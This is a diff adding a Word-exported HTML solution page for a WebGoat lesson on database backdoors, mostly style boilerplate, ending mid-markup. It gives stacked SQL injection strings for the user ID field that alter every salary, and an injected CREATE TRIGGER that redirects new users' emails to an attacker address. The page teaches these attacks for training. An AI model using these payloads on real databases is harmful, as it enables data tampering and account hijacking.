+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 1"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 1"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 1"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 1"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 1"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 1"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 1"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 1"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 2"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 2"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 2"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 2"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 2"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 2"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 2"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 2"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 2"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 2"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 2"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 2"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 2"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 2"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 3"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 3"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 3"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 3"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 3"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 3"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 3"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 3"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 3"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 3"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 3"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 3"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 3"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 3"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 4"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 4"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 4"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 4"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 4"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 4"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 4"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 4"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 4"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 4"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 4"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 4"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 4"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 4"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 5"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 5"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 5"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 5"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 5"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 5"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 5"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 5"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 5"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 5"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 5"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 5"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 5"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 5"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 6"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 6"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 6"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 6"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 6"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 6"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 6"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 6"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 6"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 6"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 6"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 6"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 6"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 6"/>
+  <w:LsdException Locked="false" Priority="19" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Subtle Emphasis"/>
+  <w:LsdException Locked="false" Priority="21" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Intense Emphasis"/>
+  <w:LsdException Locked="false" Priority="31" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Subtle Reference"/>
+  <w:LsdException Locked="false" Priority="32" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Intense Reference"/>
+  <w:LsdException Locked="false" Priority="33" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Book Title"/>
+  <w:LsdException Locked="false" Priority="37" Name="Bibliography"/>
+  <w:LsdException Locked="false" Priority="39" QFormat="true" Name="TOC Heading"/>
+ </w:LatentStyles>
+</xml><![endif]-->
+<style>
+<!--
+ /* Font Definitions */
+ @font-face
+	{font-family:"MS Mincho";
+	panose-1:2 2 6 9 4 2 5 8 3 4;
+	mso-font-alt:"\FF2D\FF33 \660E\671D";
+	mso-font-charset:128;
+	mso-generic-font-family:modern;
+	mso-font-pitch:fixed;
+	mso-font-signature:-1610612033 1757936891 16 0 131231 0;}
+@font-face
+	{font-family:"Cambria Math";
+	panose-1:2 4 5 3 5 4 6 3 2 4;
+	mso-font-charset:0;
+	mso-generic-font-family:roman;
+	mso-font-pitch:variable;
+	mso-font-signature:-1610611985 1107304683 0 0 159 0;}
+@font-face
+	{font-family:Tahoma;
+	panose-1:2 11 6 4 3 5 4 4 2 4;
+	mso-font-charset:0;
+	mso-generic-font-family:swiss;
+	mso-font-pitch:variable;
+	mso-font-signature:1627400839 -2147483648 8 0 66047 0;}
+@font-face
+	{font-family:"\@MS Mincho";
+	panose-1:2 2 6 9 4 2 5 8 3 4;
+	mso-font-charset:128;
+	mso-generic-font-family:modern;
+	mso-font-pitch:fixed;
+	mso-font-signature:-1610612033 1757936891 16 0 131231 0;}
+ /* Style Definitions */
+ p.MsoNormal, li.MsoNormal, div.MsoNormal
+	{mso-style-unhide:no;
+	mso-style-qformat:yes;
+	mso-style-parent:"";
+	margin:0cm;
+	margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	font-size:12.0pt;
+	font-family:"Times New Roman","serif";
+	mso-fareast-font-family:"Times New Roman";}
+h1
+	{mso-style-unhide:no;
+	mso-style-qformat:yes;
+	mso-style-link:"Heading 1 Char";
+	mso-style-next:Normal;
+	margin-top:12.0pt;
+	margin-right:0cm;
+	margin-bottom:3.0pt;
+	margin-left:0cm;
+	mso-pagination:widow-orphan;
+	page-break-after:avoid;
+	mso-outline-level:1;
+	font-size:16.0pt;
+	font-family:"Arial","sans-serif";
+	mso-fareast-font-family:"MS Mincho";
+	mso-font-kerning:16.0pt;
+	mso-fareast-language:JA;
+	font-weight:bold;}
+h2
+	{mso-style-noshow:yes;
+	mso-style-priority:9;
+	mso-style-qformat:yes;
+	mso-style-link:"Heading 2 Char";
+	mso-style-next:Normal;
+	margin-top:10.0pt;
+	margin-right:0cm;
+	margin-bottom:0cm;
+	margin-left:0cm;
+	margin-bottom:.0001pt;
+	mso-pagination:widow-orphan lines-together;
+	page-break-after:avoid;
+	mso-outline-level:2;
+	font-size:13.0pt;
+	font-family:"Cambria","serif";
+	mso-ascii-font-family:Cambria;
+	mso-ascii-theme-font:major-latin;
+	mso-fareast-font-family:"Times New Roman";
+	mso-fareast-theme-font:major-fareast;
+	mso-hansi-font-family:Cambria;
+	mso-hansi-theme-font:major-latin;
+	mso-bidi-font-family:"Times New Roman";
+	mso-bidi-theme-font:major-bidi;
+	color:#4F81BD;
+	mso-themecolor:accent1;
+	font-weight:bold;}
+h3
+	{mso-style-noshow:yes;
+	mso-style-qformat:yes;
+	mso-style-link:"Heading 3 Char";
+	mso-style-next:Normal;
+	margin-top:12.0pt;
+	margin-right:0cm;
+	margin-bottom:3.0pt;
+	margin-left:0cm;
+	mso-pagination:widow-orphan;
+	page-break-after:avoid;
+	mso-outline-level:3;
+	font-size:13.0pt;
+	font-family:"Arial","sans-serif";
+	mso-fareast-font-family:"Times New Roman";
+	font-weight:bold;}
+p.MsoCaption, li.MsoCaption, div.MsoCaption
+	{mso-style-noshow:yes;
+	mso-style-qformat:yes;
+	mso-style-next:Normal;
+	margin:0cm;
+	margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	font-size:10.0pt;
+	font-family:"Times New Roman","serif";
+	mso-fareast-font-family:"Times New Roman";
+	font-weight:bold;}
+p.MsoEnvelopeReturn, li.MsoEnvelopeReturn, div.MsoEnvelopeReturn
+	{mso-style-noshow:yes;
+	mso-style-priority:99;
+	margin:0cm;
+	margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	font-size:12.0pt;
+	font-family:"Times New Roman","serif";
+	mso-fareast-font-family:"Times New Roman";
+	mso-fareast-theme-font:major-fareast;}
+a:link, span.MsoHyperlink
+	{mso-style-noshow:yes;
+	color:blue;
+	text-decoration:underline;
+	text-underline:single;}
+a:visited, span.MsoHyperlinkFollowed
+	{mso-style-noshow:yes;
+	mso-style-priority:99;
+	color:purple;
+	mso-themecolor:followedhyperlink;
+	text-decoration:underline;
+	text-underline:single;}
+p
+	{mso-style-noshow:yes;
+	mso-margin-top-alt:auto;
+	margin-right:0cm;
+	mso-margin-bottom-alt:auto;
+	margin-left:0cm;
+	mso-pagination:widow-orphan;
+	font-size:12.0pt;
+	font-family:"Times New Roman","serif";
+	mso-fareast-font-family:"Times New Roman";}
+pre
+	{mso-style-noshow:yes;
+	mso-style-priority:99;
+	mso-style-link:"HTML Preformatted Char";
+	margin:0cm;
+	margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	tab-stops:45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt;
+	font-size:10.0pt;
+	font-family:"Courier New";
+	mso-fareast-font-family:"Times New Roman";}
+p.MsoAcetate, li.MsoAcetate, div.MsoAcetate
+	{mso-style-noshow:yes;
+	mso-style-priority:99;
+	mso-style-link:"Balloon Text Char";
+	margin:0cm;
+	margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	font-size:8.0pt;
+	font-family:"Tahoma","sans-serif";
+	mso-fareast-font-family:"Times New Roman";}
+span.Heading1Char
+	{mso-style-name:"Heading 1 Char";
+	mso-style-unhide:no;
+	mso-style-locked:yes;
+	mso-style-link:"Heading 1";
+	mso-ansi-font-size:16.0pt;
+	mso-bidi-font-size:16.0pt;
+	font-family:"MS Mincho";
+	mso-ascii-font-family:"MS Mincho";
+	mso-fareast-font-family:"MS Mincho";
+	mso-hansi-font-family:"MS Mincho";
+	mso-bidi-font-family:Arial;
+	mso-font-kerning:16.0pt;
+	mso-fareast-language:JA;
+	font-weight:bold;}
+span.Heading2Char
+	{mso-style-name:"Heading 2 Char";
+	mso-style-noshow:yes;
+	mso-style-priority:9;
+	mso-style-unhide:no;
+	mso-style-locked:yes;
+	mso-style-link:"Heading 2";
+	mso-ansi-font-size:13.0pt;
+	mso-bidi-font-size:13.0pt;
+	font-family:"Cambria","serif";
+	mso-ascii-font-family:Cambria;
+	mso-ascii-theme-font:major-latin;
+	mso-fareast-font-family:"Times New Roman";
+	mso-fareast-theme-font:major-fareast;
+	mso-hansi-font-family:Cambria;
+	mso-hansi-theme-font:major-latin;
+	color:#4F81BD;
+	mso-themecolor:accent1;
+	font-weight:bold;}
+span.Heading3Char
+	{mso-style-name:"Heading 3 Char";
+	mso-style-noshow:yes;
+	mso-style-unhide:no;
+	mso-style-locked:yes;
+	mso-style-link:"Heading 3";
+	mso-ansi-font-size:13.0pt;
+	mso-bidi-font-size:13.0pt;
+	font-family:"Times New Roman","serif";
+	mso-ascii-font-family:"Times New Roman";
+	mso-fareast-font-family:"Times New Roman";
+	mso-hansi-font-family:"Times New Roman";
+	mso-bidi-font-family:Arial;
+	font-weight:bold;}
+span.HTMLPreformattedChar
+	{mso-style-name:"HTML Preformatted Char";
+	mso-style-noshow:yes;
+	mso-style-priority:99;
+	mso-style-unhide:no;
+	mso-style-locked:yes;
+	mso-style-link:"HTML Preformatted";
+	font-family:"Courier New";
+	mso-ascii-font-family:"Courier New";
+	mso-fareast-font-family:"Times New Roman";
+	mso-hansi-font-family:"Courier New";
+	mso-bidi-font-family:"Courier New";}
+span.BalloonTextChar
+	{mso-style-name:"Balloon Text Char";
+	mso-style-noshow:yes;
+	mso-style-priority:99;
+	mso-style-unhide:no;
+	mso-style-locked:yes;
+	mso-style-link:"Balloon Text";
+	mso-ansi-font-size:8.0pt;
+	mso-bidi-font-size:8.0pt;
+	font-family:"Tahoma","sans-serif";
+	mso-ascii-font-family:Tahoma;
+	mso-fareast-font-family:"Times New Roman";
+	mso-hansi-font-family:Tahoma;
+	mso-bidi-font-family:Tahoma;}
+.MsoChpDefault
+	{mso-style-type:export-only;
+	mso-default-props:yes;
+	font-size:10.0pt;
+	mso-ansi-font-size:10.0pt;
+	mso-bidi-font-size:10.0pt;
+	mso-ascii-font-family:Arial;
+	mso-fareast-font-family:Calibri;
+	mso-fareast-theme-font:minor-latin;
+	mso-hansi-font-family:Arial;
+	mso-bidi-font-family:"Times New Roman";
+	mso-bidi-theme-font:major-bidi;}
+@page Section1
+	{size:595.3pt 841.9pt;
+	margin:70.55pt 56.9pt 70.55pt 56.9pt;
+	mso-header-margin:35.3pt;
+	mso-footer-margin:35.3pt;
+	mso-title-page:yes;
+	mso-paper-source:0;}
+div.Section1
+	{page:Section1;}
+-->
+</style>
+<!--[if gte mso 10]>
+<style>
+ /* Style Definitions */
+ table.MsoNormalTable
+	{mso-style-name:"Table Normal";
+	mso-tstyle-rowband-size:0;
+	mso-tstyle-colband-size:0;
+	mso-style-noshow:yes;
+	mso-style-priority:99;
+	mso-style-qformat:yes;
+	mso-style-parent:"";
+	mso-padding-alt:0cm 5.4pt 0cm 5.4pt;
+	mso-para-margin:0cm;
+	mso-para-margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	font-size:10.0pt;
+	font-family:"Arial","sans-serif";
+	mso-bidi-font-family:"Times New Roman";
+	mso-bidi-theme-font:major-bidi;}
+</style>
+<![endif]--><!--[if gte mso 9]><xml>
+ <o:shapedefaults v:ext="edit" spidmax="4098"/>
+</xml><![endif]--><!--[if gte mso 9]><xml>
+ <o:shapelayout v:ext="edit">
+  <o:idmap v:ext="edit" data="1"/>
+ </o:shapelayout></xml><![endif]-->
+</head>
+
+<body lang=EN-US link=blue vlink=purple style='tab-interval:36.0pt'>
+
+<div class=Section1>
+
+<p class=MsoNormal><b><span style='font-family:"Arial","sans-serif"'>Lesson
+Plan Title:</span></b><span style='font-family:"Arial","sans-serif"'> How to
+Create Database Back Door Attacks.<o:p></o:p></span></p>
+
+<p class=MsoNormal><b><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></b></p>
+
+<p class=MsoNormal><b><span style='font-family:"Arial","sans-serif"'>Concept /
+Topic To Teach:</span></b><span style='font-family:"Arial","sans-serif"'> <o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>How to Create
+Database Back Door Attacks. <o:p></o:p></span></p>
+
+<p class=MsoNormal><b><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></b></p>
+
+<p class=MsoNormal><b><span style='font-family:"Arial","sans-serif"'>How the
+attacks works:</span></b><span style='font-family:"Arial","sans-serif"'> <o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Databases are
+used usually as a backend for web applications. Also it is used as a media of
+storage. It can also be used as a place to store a malicious activity such as a
+trigger. A trigger is called by the database management system upon the
+execution of another database operation like insert, select, update or delete.
+An attacker for example can create a trigger that would set his email address
+instead of every new user's email address. <o:p></o:p></span></p>
+
+<p class=MsoNormal><b><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></b></p>
+
+<p class=MsoNormal><b><span style='font-family:"Arial","sans-serif"'>General
+Goal(s):</span></b><span style='font-family:"Arial","sans-serif"'> <o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><!-- Start Instructions -->Your
+goal should be to learn how you can exploit a vulnerable query to create a
+trigger.<br>
+You will not be able to actually create one in this lesson because the
+underlying database engine used with WebGoat doesn't support triggers.<br>
+Your login ID is 101.</span><span style='font-family:"Arial","sans-serif";
+mso-fareast-language:JA'><o:p></o:p></span></p>
+
+<p class=MsoNormal><o:p>&nbsp;</o:p></p>
+
+<p class=MsoNormal style='page-break-after:avoid'><span style='mso-no-proof:
+yes'><!--[if gte vml 1]><v:shapetype id="_x0000_t75" coordsize="21600,21600"
+ o:spt="75" o:preferrelative="t" path="m@4@5l@4@11@9@11@9@5xe" filled="f"
+ stroked="f">
+ <v:stroke joinstyle="miter"/>
+ <v:formulas>
+  <v:f eqn="if lineDrawn pixelLineWidth 0"/>
+  <v:f eqn="sum @0 1 0"/>
+  <v:f eqn="sum 0 0 @1"/>
+  <v:f eqn="prod @2 1 2"/>
+  <v:f eqn="prod @3 21600 pixelWidth"/>
+  <v:f eqn="prod @3 21600 pixelHeight"/>
+  <v:f eqn="sum @0 0 1"/>
+  <v:f eqn="prod @6 1 2"/>
+  <v:f eqn="prod @7 21600 pixelWidth"/>
+  <v:f eqn="sum @8 21600 0"/>
+  <v:f eqn="prod @7 21600 pixelHeight"/>
+  <v:f eqn="sum @10 21600 0"/>
+ </v:formulas>
+ <v:path o:extrusionok="f" gradientshapeok="t" o:connecttype="rect"/>
+ <o:lock v:ext="edit" aspectratio="t"/>
+</v:shapetype><v:shape id="Picture_x0020_147" o:spid="_x0000_i1030" type="#_x0000_t75"
+ style='width:480pt;height:277.5pt;visibility:visible;mso-wrap-style:square'>
+ <v:imagedata src="/WebGoat/lesson_solutions/BackDoors_files/image001.png" o:title=""/>
+</v:shape><![endif]--><![if !vml]><img width=640 height=370
+src="/WebGoat/lesson_solutions/BackDoors_files/image013.jpg" v:shapes="Picture_x0020_147"><![endif]></span></p>
+
+<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
+field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
+<span style='mso-element:field-separator'></span><![endif]--><span
+style='mso-no-proof:yes'>1</span><!--[if supportFields]><span style='mso-element:
+field-end'></span><![endif]--> Database backdoor</p>
+
+<p class=MsoNormal><o:p>&nbsp;</o:p></p>
+
+<p class=MsoNormal><b><span style='font-family:"Arial","sans-serif"'>Solution:<o:p></o:p></span></b></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif";mso-bidi-font-weight:
+bold'>Enter your user ID 101 to see how the application works.<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif";mso-bidi-font-weight:
+bold'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal style='page-break-after:avoid'><span style='font-family:
+"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_148"
+ o:spid="_x0000_i1029" type="#_x0000_t75" style='width:480pt;height:277.5pt;
+ visibility:visible;mso-wrap-style:square'>
+ <v:imagedata src="/WebGoat/lesson_solutions/BackDoors_files/image003.png" o:title=""/>
+</v:shape><![endif]--><![if !vml]><img width=640 height=370
+src="/WebGoat/lesson_solutions/BackDoors_files/image014.jpg" v:shapes="Picture_x0020_148"><![endif]></span></p>
+
+<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
+field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
+<span style='mso-element:field-separator'></span><![endif]--><span
+style='mso-no-proof:yes'>2</span><!--[if supportFields]><span style='mso-element:
+field-end'></span><![endif]--> User ID is 101</p>
+
+<p class=MsoNormal><o:p>&nbsp;</o:p></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>As you
+probably noticed, the input is not validated so very easy to do SQL Injection.
+To have two SQL queries executed, you need to separate them using a sem-colon.
+For example select * from employees; drop table employees will first select all
+the users from employees and then drop the table employees. Not all databases
+support multiple SQL statements.<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Here you need
+to update the salary of the employees. This requires an update query like
+update employees set salary=10000.<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Inject this
+for the user ID: 101; update employee set salary=10000<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal style='page-break-after:avoid'><span style='font-family:
+"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_149"
+ o:spid="_x0000_i1028" type="#_x0000_t75" style='width:480pt;height:277.5pt;
+ visibility:visible;mso-wrap-style:square'>
+ <v:imagedata src="/WebGoat/lesson_solutions/BackDoors_files/image005.png" o:title=""/>
+</v:shape><![endif]--><![if !vml]><img width=640 height=370
+src="/WebGoat/lesson_solutions/BackDoors_files/image015.jpg" v:shapes="Picture_x0020_149"><![endif]></span></p>
+
+<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
+field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
+<span style='mso-element:field-separator'></span><![endif]--><span
+style='mso-no-proof:yes'>3</span><!--[if supportFields]><span style='mso-element:
+field-end'></span><![endif]--> Update query<span style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif";mso-bidi-font-weight:
+bold'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal style='page-break-after:avoid'><span style='font-family:
+"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_150"
+ o:spid="_x0000_i1027" type="#_x0000_t75" style='width:480pt;height:277.5pt;
+ visibility:visible;mso-wrap-style:square'>
+ <v:imagedata src="/WebGoat/lesson_solutions/BackDoors_files/image007.png" o:title=""/>
+</v:shape><![endif]--><![if !vml]><img width=640 height=370
+src="/WebGoat/lesson_solutions/BackDoors_files/image016.jpg" v:shapes="Picture_x0020_150"><![endif]></span></p>
+
+<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
+field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
+<span style='mso-element:field-separator'></span><![endif]--><span
+style='mso-no-proof:yes'>4</span><!--[if supportFields]><span style='mso-element:
+field-end'></span><![endif]--> Stage 1 completed</p>
+
+<p class=MsoNormal><o:p>&nbsp;</o:p></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>To create a
+database trigger, you need to inject the following SQL: CREATE TRIGGER
+myBackDoor BEFORE INSERT ON employee FOR EACH ROW BEGIN UPDATE employee SET
+email='john@hackme.com'WHERE userid = NEW.userid<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal style='page-break-after:avoid'><span style='font-family:
+"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_151"
+ o:spid="_x0000_i1026" type="#_x0000_t75" style='width:480pt;height:277.5pt;
+ visibility:visible;mso-wrap-style:square'>
